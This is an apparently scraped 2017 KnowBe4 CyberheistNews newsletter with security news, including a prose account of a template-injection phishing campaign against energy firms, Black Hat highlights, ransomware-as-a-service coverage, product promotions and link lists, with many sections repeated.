CyberheistNews Vol 7 #30
Scary New Social Engineering Attack Turns Off Your Power 
OK, better get thinking about generators and 1,000 gallon drums of fuel to keep your data center up & running (which you should have done anyway for your disaster recovery plans...)
A new attack vector that bypasses all your software defenses has been discovered by Israeli cybersecurity company Cyberint. At the moment the bad guys are targeting US and UK energy companies which could cause power cuts and even cost lives, but this tactic could be used against anyone.
Here is how it plays out. A "honey-doc" masquerades as a resume attached to a harmless email. Both email and attachment are totally clean and contain no malicious code whatsoever. That's what makes them undetectable to any kind of incoming email filter.
However, the Word doc *is* weaponized with a template reference that, when the document is loaded, connects to the attacker’s server via Server Message Block and downloads a Word template which has an extremely well-hidden malicious payload.
The connection to the SMB server also provides the attacker with the victim’s credentials, which can then be used to acquire sensitive information and/or infiltrate the network and/or control systems used by the targeted employee.
The campaign appears to have started in May, and as it is targeted at infrastructure control systems of US and UK energy companies, it's not too hard to guess who is behind it.
The problem is that once this type of attack is out there in the wild (remember StuxNet?) all kinds of bad guys get their hands on it. To protect against this type of attack, you want to step your employees through new-school security awareness training so that they do not fall for social engineering tactics like this.
Start with a no-charge Phishing Security Test and find out what percentage of your users will click an email that seems to come from IT@yourdomain.com. Start here:
https://info.knowbe4.com/phishing-security-test-chn
OK, better get thinking about generators and 1,000 gallon drums of fuel to keep your data center up & running (which you should have done anyway for your disaster recovery plans...)
A new attack vector that bypasses all your software defenses has been discovered by Israeli cybersecurity company Cyberint. At the moment the bad guys are targeting US and UK energy companies which could cause power cuts and even cost lives, but this tactic could be used against anyone.
Here is how it plays out. A "honey-doc" masquerades as a resume attached to a harmless email. Both email and attachment are totally clean and contain no malicious code whatsoever. That's what makes them undetectable to any kind of incoming email filter.
However, the Word doc *is* weaponized with a template reference that, when the document is loaded, connects to the attacker’s server via Server Message Block and downloads a Word template which has an extremely well-hidden malicious payload.
The connection to the SMB server also provides the attacker with the victim’s credentials, which can then be used to acquire sensitive information and/or infiltrate the network and/or control systems used by the targeted employee.
The campaign appears to have started in May, and as it is targeted at infrastructure control systems of US and UK energy companies, it's not too hard to guess who is behind it.
The problem is that once this type of attack is out there in the wild (remember StuxNet?) all kinds of bad guys get their hands on it. To protect against this type of attack, you want to step your employees through new-school security awareness training so that they do not fall for social engineering tactics like this.
Start with a no-charge Phishing Security Test and find out what percentage of your users will click an email that seems to come from IT@yourdomain.com. Start here:
https://info.knowbe4.com/phishing-security-test-chn
I Was at Black Hat / Def Con This Week. Wow. [VIDEO]
If you could not make it, it was fun, but a zoo, and Def Con was crowded with a rumored 30,000 attendees. It certainly felt like it! Here are some highlights, and more to come when I get back in the office:
If you could not make it, it was fun, but a zoo, and Def Con was crowded with a rumored 30,000 attendees. It certainly felt like it! Here are some highlights, and more to come when I get back in the office:
- The Black Hat Keynote:
https://youtu.be/EC4EC5fcPL0
- I was interviewed by Dark Reading about social engineering. Scroll to 2:25:00:
https://youtu.be/pSlgo3kNNsQ
- Black Hat USA 2017 Attendee Survey Results. They released their third annual research report entitled, "Portrait of an Imminent Cyber Threat." The report is based on survey responses from nearly 600 Black Hat USA attendees. This year’s research explores issues on a national scale and raises concerns about potential threats to the U.S’s critical infrastructure, tools available for nation state attacks, WikiLeaks and more. You can download your copy here:
https://www.blackhat.com/docs/us-17/2017-Black-Hat-Attendee-Survey.pdf
- Black Hat presentation: Clever New Tool Shuts Down Ransomware Before It's Too Late:
https://www.wired.com/story/shieldfs-ransomware-protection-tool/
- Black Hat presentation: Active Directory Botnet sets up C&C infrastructure inside infected networks, while bypassing defenses. Techniques exploiting legitimate capabilities & controls. Scary!:
https://www.scmagazine.com/active-directory-botnet-sets-up-cc-infrastructure-inside-infected-networks-while-bypassing-defenses/article/677864/ - The winners of the PWNIE awards were announced and CSO wrote about them:
http://www.csoonline.com/article/3211592/security/winners-of-the-2017-pwnie-awards.html
Don’t Miss The August Live Demo: New-School Security Awareness Training
Today, your employees are frequently exposed to sophisticated phishing and ransomware attacks. Old-school security awareness training doesn’t hack it anymore. More than ever, your users are the weak link in your network security.
Join us on Wednesday, August 9, 2017, at 2:00 p.m. (EDT) for a 30-minute live product demonstration of KnowBe4’s Security Awareness Training and Simulated Phishing Platform to see the latest features and how easy it is to train and phish your users:
Register Now: https://register.gotowebinar.com/register/5545902949806655747
Today, your employees are frequently exposed to sophisticated phishing and ransomware attacks. Old-school security awareness training doesn’t hack it anymore. More than ever, your users are the weak link in your network security.
Join us on Wednesday, August 9, 2017, at 2:00 p.m. (EDT) for a 30-minute live product demonstration of KnowBe4’s Security Awareness Training and Simulated Phishing Platform to see the latest features and how easy it is to train and phish your users:
- NEW, Customized Automated Security Awareness Program creates a fully mature training program in just a few minutes!
- Social Engineering Indicators patent-pending technology, turns every simulated phishing email into a tool IT can use to instantly train employees.
- Access to the world's largest library of awareness training content through our innovative Module Store.
- Send Simulated Phishing tests to your users during specified business hours with "Reply-To Tracking" that shows you which users fall for spoofed emails and what they answer to the bad guys.
- Reporting to watch your Phish-prone percentage drop, with great ROI.
Register Now: https://register.gotowebinar.com/register/5545902949806655747
Surprising Moves in Cybersecurity 500 List for Q2
Cybersecurity Ventures continuously looks at new companies for inclusion in the Cybersecurity 500, by soliciting feedback from CISOs, IT security practitioners and service providers, and researching hundreds of cybersecurity events and news sources, and Cybersecurity Ventures has released its Cybersecurity 500 List for Q2 2017.
root9B and Herjavec Group remained number one and two, respectively, from the Q1 cybersecurity listing, but after that, there was a lot of movement in the top 10. Raytheon, for instance, moved into the number three position thanks to a historic cybersecurity deal valued at nearly $1 billion over five years with the U.S. Department of Homeland Security. IBM and Cisco both returned to the top 10 after hovering just outside that plateau in February. And KnowBe4 made a huge jump from number 38 in Q1 to six in Q2.
How do companies make significant moves, both up and down, in only a few months?
“We look at companies in a few different contexts,” explained Steve Morgan, founder and editor-in-chief at the Cybersecurity 500. “We are always evaluating revenue growth and market execution. But then we are also looking at what are the biggest challenges and which companies are doing what to help solve them.”
Take IBM as an example. “It may not be that obvious,” Morgan said, “but they are throwing a lot of weight behind supporting cybersecurity education at the high school level - which ties directly to the workforce shortage our industry is grappling with.”
Morgan emphasized the importance of security awareness training. Spending for security education is expected to reach $10 billion by 2027. “Security awareness has evolved from training employees to a discipline that is just as complicated and important as any other in our field,” he stated, and this played a role in KnowBe4’s jump in the rankings.
KnowBe4 was very surprising, moving up so much, Morgan admitted. “While the security awareness market is growing very quickly, it is an established space with dozens of companies who have been in it for years and quite a few new market entrants,” he added. “KnowBe4 keep doubling revenues and getting as big as they are - I couldn't have expected that they'd grow so much again over the past year. But, given they are in one of the biggest growth markets and have such a visible officer (Kevin Mitnick, Chief Hacking Officer), it makes sense.” More:
http://www.itbusinessedge.com/articles/surprising-moves-in-cybersecurity-500-list-for-q2.html
Let's stay safe out there.
Cybersecurity Ventures continuously looks at new companies for inclusion in the Cybersecurity 500, by soliciting feedback from CISOs, IT security practitioners and service providers, and researching hundreds of cybersecurity events and news sources, and Cybersecurity Ventures has released its Cybersecurity 500 List for Q2 2017.
root9B and Herjavec Group remained number one and two, respectively, from the Q1 cybersecurity listing, but after that, there was a lot of movement in the top 10. Raytheon, for instance, moved into the number three position thanks to a historic cybersecurity deal valued at nearly $1 billion over five years with the U.S. Department of Homeland Security. IBM and Cisco both returned to the top 10 after hovering just outside that plateau in February. And KnowBe4 made a huge jump from number 38 in Q1 to six in Q2.
How do companies make significant moves, both up and down, in only a few months?
“We look at companies in a few different contexts,” explained Steve Morgan, founder and editor-in-chief at the Cybersecurity 500. “We are always evaluating revenue growth and market execution. But then we are also looking at what are the biggest challenges and which companies are doing what to help solve them.”
Take IBM as an example. “It may not be that obvious,” Morgan said, “but they are throwing a lot of weight behind supporting cybersecurity education at the high school level - which ties directly to the workforce shortage our industry is grappling with.”
Morgan emphasized the importance of security awareness training. Spending for security education is expected to reach $10 billion by 2027. “Security awareness has evolved from training employees to a discipline that is just as complicated and important as any other in our field,” he stated, and this played a role in KnowBe4’s jump in the rankings.
KnowBe4 was very surprising, moving up so much, Morgan admitted. “While the security awareness market is growing very quickly, it is an established space with dozens of companies who have been in it for years and quite a few new market entrants,” he added. “KnowBe4 keep doubling revenues and getting as big as they are - I couldn't have expected that they'd grow so much again over the past year. But, given they are in one of the biggest growth markets and have such a visible officer (Kevin Mitnick, Chief Hacking Officer), it makes sense.” More:
http://www.itbusinessedge.com/articles/surprising-moves-in-cybersecurity-500-list-for-q2.html
Let's stay safe out there.
Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc.
Quotes of the Week
"If you don't want anyone to know, don't do it." - Chinese Proverb
"Risk comes from not knowing what you're doing." - Warren Buffett
Thanks for reading CyberheistNews
"Risk comes from not knowing what you're doing." - Warren Buffett
Thanks for reading CyberheistNews
Security News
The Lazy Habits of Phishing Attackers
Ransomware as a service (RaaS) has been around for a while. But it has typically been found on the dark web. In recent months, its creators have grown more brazen about promoting it on the open web, and that has the potential to change everything. Few RaaS kits exemplify this the way Philadelphia does.
At Black Hat 2017, Sophos released an in-depth report on the subject, Ransomware as a Service (RaaS): Deconstructing Philadelphia, written by Dorka Palotay, a threat researcher based in SophosLabs’ Budapest, Hungary, office. It delves into the inner mechanics of a ransomware kit anyone can buy for $400. Once purchased, the bad guys can hijack and hold computer data for ransom in exchange for payment. More:
https://nakedsecurity.sophos.com/2017/07/25/ransomware-as-a-service-how-the-bad-guys-marketed-philadelphia/
Ransomware as a service (RaaS) has been around for a while. But it has typically been found on the dark web. In recent months, its creators have grown more brazen about promoting it on the open web, and that has the potential to change everything. Few RaaS kits exemplify this the way Philadelphia does.
At Black Hat 2017, Sophos released an in-depth report on the subject, Ransomware as a Service (RaaS): Deconstructing Philadelphia, written by Dorka Palotay, a threat researcher based in SophosLabs’ Budapest, Hungary, office. It delves into the inner mechanics of a ransomware kit anyone can buy for $400. Once purchased, the bad guys can hijack and hold computer data for ransom in exchange for payment. More:
https://nakedsecurity.sophos.com/2017/07/25/ransomware-as-a-service-how-the-bad-guys-marketed-philadelphia/
This Is What Happens When You Reply to Spam Email. FUN
Suspicious emails: unclaimed insurance bonds, diamond-encrusted safe deposit boxes, close friends marooned in a foreign country. They pop up in our inboxes, and standard procedure is to delete on sight. But what happens when you reply? Follow along as writer and comedian James Veitch narrates a hilarious, weeks-long exchange with a spammer who offered to cut him in on a hot deal. FUN! But do not try this at home...
https://www.ted.com/talks/james_veitch_this_is_what_happens_when_you_reply_to_spam_email
Suspicious emails: unclaimed insurance bonds, diamond-encrusted safe deposit boxes, close friends marooned in a foreign country. They pop up in our inboxes, and standard procedure is to delete on sight. But what happens when you reply? Follow along as writer and comedian James Veitch narrates a hilarious, weeks-long exchange with a spammer who offered to cut him in on a hot deal. FUN! But do not try this at home...
https://www.ted.com/talks/james_veitch_this_is_what_happens_when_you_reply_to_spam_email
Top 10 Twitter Accounts to Track the Latest Phishing Scams
TechInsurance wrote; "Once we get hip to one phishing scam, a new one pops up. As a busy IT consultant, you can't spend all day researching the latest phishing attacks. Fortunately, there is an easy way to keep track of the new phishing scams tormenting your clients – Twitter!
We combed through Twitter to find some of the most reputable – and frequent – tweeters who regularly post about phishing scams and other cyber security issues. If you follow these 10 Twitter accounts, you should be among the first to know about the latest cyber threats." I was their No.1 -- Pretty nice..
http://www.techinsurance.com/blog/cyber-risk/top-10-twitter-accounts-to-track-the-latest-phishing-scams/
TechInsurance wrote; "Once we get hip to one phishing scam, a new one pops up. As a busy IT consultant, you can't spend all day researching the latest phishing attacks. Fortunately, there is an easy way to keep track of the new phishing scams tormenting your clients – Twitter!
We combed through Twitter to find some of the most reputable – and frequent – tweeters who regularly post about phishing scams and other cyber security issues. If you follow these 10 Twitter accounts, you should be among the first to know about the latest cyber threats." I was their No.1 -- Pretty nice..
http://www.techinsurance.com/blog/cyber-risk/top-10-twitter-accounts-to-track-the-latest-phishing-scams/
NIST Cybersecurity Framework (CSF) Sprint 2017 Workshop Findings
Chris Hoover at RSA wrote: "To shape their Cybersecurity Framework (CSF), NIST convenes a series of workshops open to any industry practitioners, vendors, or academics who wish to attend.
I recently returned from the 2017 NIST CSF Workshop at their headquarters in Gaithersburg, MD. For those interested in the NIST CSF but were unable to attend, I will quickly run through the highlights. The exciting thing about these workshops that makes them different from any other framework or guidance is the feedback from the audience gets translated in very high fidelity into the next version of the CSF.
In addition to a recent round of public review, feedback from the 2017 workshop will be incorporated into CSF version 1.1 later this year. Keeping this in mind, the feedback captured below is a sneak-peek into what the finalized NIST CSF 1.1 might look like.
The bullets are a mixture of comments and recommendations from the conference attendees for each topic. These comments are very high level, but you can access recordings of many of the sessions here. If I were a betting person, I would expect to see most of these items incorporated into the NIST CSF roadmap and for many to be in the final version of NIST CSF 1.1. Here is the article:
https://blogs.rsa.com/nist-csf-spring-2017-workshop-findings/
I like this because the NIST CSF Framework is getting so much attention. Not only is it a Presidential Order but it is going to be more precise. We help you and make it easy to build and document these NIST controls (and any other) using the KnowBe4 Compliance Manager (KCM). Your audit shows your compliance in half the time and at half the cost. Get a demo of KCM and see for yourself:
https://www.knowbe4.com/products/compliance-manager-software
Chris Hoover at RSA wrote: "To shape their Cybersecurity Framework (CSF), NIST convenes a series of workshops open to any industry practitioners, vendors, or academics who wish to attend.
I recently returned from the 2017 NIST CSF Workshop at their headquarters in Gaithersburg, MD. For those interested in the NIST CSF but were unable to attend, I will quickly run through the highlights. The exciting thing about these workshops that makes them different from any other framework or guidance is the feedback from the audience gets translated in very high fidelity into the next version of the CSF.
In addition to a recent round of public review, feedback from the 2017 workshop will be incorporated into CSF version 1.1 later this year. Keeping this in mind, the feedback captured below is a sneak-peek into what the finalized NIST CSF 1.1 might look like.
The bullets are a mixture of comments and recommendations from the conference attendees for each topic. These comments are very high level, but you can access recordings of many of the sessions here. If I were a betting person, I would expect to see most of these items incorporated into the NIST CSF roadmap and for many to be in the final version of NIST CSF 1.1. Here is the article:
https://blogs.rsa.com/nist-csf-spring-2017-workshop-findings/
I like this because the NIST CSF Framework is getting so much attention. Not only is it a Presidential Order but it is going to be more precise. We help you and make it easy to build and document these NIST controls (and any other) using the KnowBe4 Compliance Manager (KCM). Your audit shows your compliance in half the time and at half the cost. Get a demo of KCM and see for yourself:
https://www.knowbe4.com/products/compliance-manager-software
Get Your Customized Automated Security Awareness Program, ASAP!
Many IT pros don’t exactly know where to start when it comes to creating a security awareness program that will work for their organization.
We’ve taken away all the guesswork with our Free Automated Security Awareness Program builder (ASAP). ASAP is a revolutionary new tool for IT professionals, which builds a customized Security Awareness Program for your organization that will show you the steps needed to create a fully mature training program in just a few minutes!
The program is complete with actionable tasks, helpful tips, courseware suggestions and a management calendar. You also have the ability to export the full program as a detailed or executive summary version in PDF format. This is great ammo to help you get budget and reporting to management.
Here's how it works:
https://info.knowbe4.com/asap-chn
PS: If you’re a current KnowBe4, just login to your console, click on ASAP at the top right and get started!
Many IT pros don’t exactly know where to start when it comes to creating a security awareness program that will work for their organization.
We’ve taken away all the guesswork with our Free Automated Security Awareness Program builder (ASAP). ASAP is a revolutionary new tool for IT professionals, which builds a customized Security Awareness Program for your organization that will show you the steps needed to create a fully mature training program in just a few minutes!
The program is complete with actionable tasks, helpful tips, courseware suggestions and a management calendar. You also have the ability to export the full program as a detailed or executive summary version in PDF format. This is great ammo to help you get budget and reporting to management.
Here's how it works:
- 15-25 questions depending upon answers
- Suggested training materials based on answers
- Calendar and list view of tasks
- Detailed and summary exportable PDF versions of your program
- Fully mature awareness program ready in 10 minutes
https://info.knowbe4.com/asap-chn
PS: If you’re a current KnowBe4, just login to your console, click on ASAP at the top right and get started!
Interesting News Items This Week
Nuance the Latest NotPetya Victim to Report Financial Impact:
http://www.bankinfosecurity.com/nuance-latest-notpetya-victim-to-report-financial-impact-a-10138
More Than 500,000 Systems Infected by Stantinko Malware Since 2012:
https://securityintelligence.com/news/more-than-500000-systems-infected-by-stantinko-malware-since-2012/
UniCredit breach: Data of 400,000 customers exposed. Another compromise example but what I thought was interesting is how much they were going to spend to help mitigate the risks, huge!:
https://www.helpnetsecurity.com/2017/07/26/unicredit-breach/
Iranian Espionage Campaign Hinges on Beautiful (But Fake) Woman. Good description of the lengths the bad guys go through to social engineer someone and compromise them with a honeytrap:
https://www.infosecurity-magazine.com/news/iranian-espionage-campaign-fake/
Phishers’ techniques and behaviors, and what to do if you’ve been phished. Once a user has been phished, how long does it takes for the phishers to misuse the stolen credentials:
https://www.helpnetsecurity.com/2017/07/28/phishers-tactics-and-behaviours/
Nine HIPAA settlements so far this year. Holy Moly, these are expensive:
http://medcitynews.com/2017/07/hipaa-settlements-so-far-this-year/
Nuance the Latest NotPetya Victim to Report Financial Impact:
http://www.bankinfosecurity.com/nuance-latest-notpetya-victim-to-report-financial-impact-a-10138
More Than 500,000 Systems Infected by Stantinko Malware Since 2012:
https://securityintelligence.com/news/more-than-500000-systems-infected-by-stantinko-malware-since-2012/
UniCredit breach: Data of 400,000 customers exposed. Another compromise example but what I thought was interesting is how much they were going to spend to help mitigate the risks, huge!:
https://www.helpnetsecurity.com/2017/07/26/unicredit-breach/
Iranian Espionage Campaign Hinges on Beautiful (But Fake) Woman. Good description of the lengths the bad guys go through to social engineer someone and compromise them with a honeytrap:
https://www.infosecurity-magazine.com/news/iranian-espionage-campaign-fake/
Phishers’ techniques and behaviors, and what to do if you’ve been phished. Once a user has been phished, how long does it takes for the phishers to misuse the stolen credentials:
https://www.helpnetsecurity.com/2017/07/28/phishers-tactics-and-behaviours/
Nine HIPAA settlements so far this year. Holy Moly, these are expensive:
http://medcitynews.com/2017/07/hipaa-settlements-so-far-this-year/
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
- Best Of The Year So Far: The most awesome jumps, ski, snowboard, bicycling, gymnastics, martial arts, paragliding, basketball, ping pong, tennis and wingsuit flying in 2017:
http://www.flixxy.com/people-are-awesome-best-of-the-year-2017-so-far.htm?utm_source=4
- Stunningly beautiful sequences filmed from the cockpit show what life is really like for pilots at 35,000 feet:
http://www.flixxy.com/a-stunningly-beautiful-view-from-the-cockpit.htm?utm_source=4
- The 'Real Life Sherlock Holmes' is back and continues to blow the minds of the judges and audience at America's Got Talent 2017:
http://www.flixxy.com/mind-reader-colin-cloud-amazes-americas-got-talent-2017.htm?utm_source=4
- How they pulled off the Atomic Blonde's killer action scene:
https://www.wired.com/story/atomic-blonde-killer-action-sequence?
- Why is the Mona Lisa so famous? You will probably be surprised:
http://www.flixxy.com/why-is-the-mona-lisa-so-famous.htm?utm_source=4
- Some of the World's best teeterboard performers defy gravity in Rome, Italy:
http://www.flixxy.com/worlds-best-teeterboard.htm?utm_source=4 - For the kids: Animals of all shapes and sizes love hugging as much as humans do ... maybe even more:
http://www.flixxy.com/animals-also-like-to-cuddle.htm?utm_source=4
